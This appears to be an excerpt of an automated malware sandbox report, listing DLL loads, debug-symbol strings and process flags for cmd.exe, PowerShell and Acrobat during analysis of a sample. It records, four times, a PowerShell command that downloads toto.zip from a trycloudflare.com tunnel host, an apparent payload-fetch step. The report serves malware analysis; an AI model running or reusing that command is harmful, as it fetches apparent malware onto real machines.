Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: n.pdb%]3 source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1424696724.0000017A96F3A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbs source: powershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbat source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.cat source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBCC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb;N source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1424696724.0000017A96F3A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1466952068.0000017AB120D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBCC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EA5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBD1F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000009.00000002.1466132369.0000017AB0F85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFF6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBCC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CC002000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbllf source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1466772787.0000017AB11DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbXH source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb4e089^ source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFA9FCE4AB3 pushad ; iretd 9_2_00007FFA9FCE4ADD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFA9FCE4A08 pushad ; iretd 9_2_00007FFA9FCE4ADD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFA9FCE0BCB push ds; iretd 9_2_00007FFA9FCE0BCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFA9FCE0BE2 push ds; iretd 9_2_00007FFA9FCE0BCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFA9FCE0BA5 push ds; iretd 9_2_00007FFA9FCE0BCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFA9FCE02FD push ds; iretd 9_2_00007FFA9FCE03E2
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
